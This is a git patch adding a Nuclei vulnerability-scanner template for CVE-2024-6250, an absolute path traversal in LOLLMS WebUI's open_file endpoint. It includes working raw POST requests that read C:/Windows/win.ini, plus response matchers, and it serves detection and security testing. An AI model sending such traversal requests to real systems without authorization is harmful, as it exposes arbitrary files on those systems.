From 7936293f58792ba8e66a5d9bc214c50f5c40e5f0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 28 Jan 2026 23:21:17 +0530 Subject: [PATCH] Create CVE-2024-6250.yaml --- http/cves/2024/CVE-2024-6250.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6250.yaml diff --git a/http/cves/2024/CVE-2024-6250.yaml b/http/cves/2024/CVE-2024-6250.yaml new file mode 100644 index 00000000000..16864c65463 --- /dev/null +++ b/http/cves/2024/CVE-2024-6250.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-6250 + +info: + name: LOLLMS WebUI - Absolute Path Traversal + author: ritikchaddha + severity: high + description: | + An absolute path traversal vulnerability exists in parisneo/lollms-webui v9.6, specifically in the open_file endpoint of lollms_advanced.py. The sanitize_path function with allow_absolute_path=True allows an attacker to access arbitrary files and directories on a Windows system. This vulnerability can be exploited to read any file and list arbitrary directories on the affected system. + reference: + - https://huntr.com/bounties/11a8bf9d-16f3-49b3-b5fc-ad36d8993c73 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6250 + - https://github.com/parisneo/lollms-webui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-6250 + cwe-id: CWE-36 + metadata: + max-request: 2 + vendor: lollms + product: lollms_web_ui + tags: cve,cve2024,lollms,lfi,traversal + +http: + - raw: + - | + POST /open_file HTTP/1.1 + Host: {{Hostname}} + + {"path": "C:/Windows/win.ini"} + + - | + POST /api/open_file HTTP/1.1 + Host: {{Hostname}} + + {"path": "C:/Windows/win.ini"} + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "bit app support", "[fonts]", "[extensions]")' + - 'contains(content_type, "text/plain")' + - "status_code == 200" + condition: and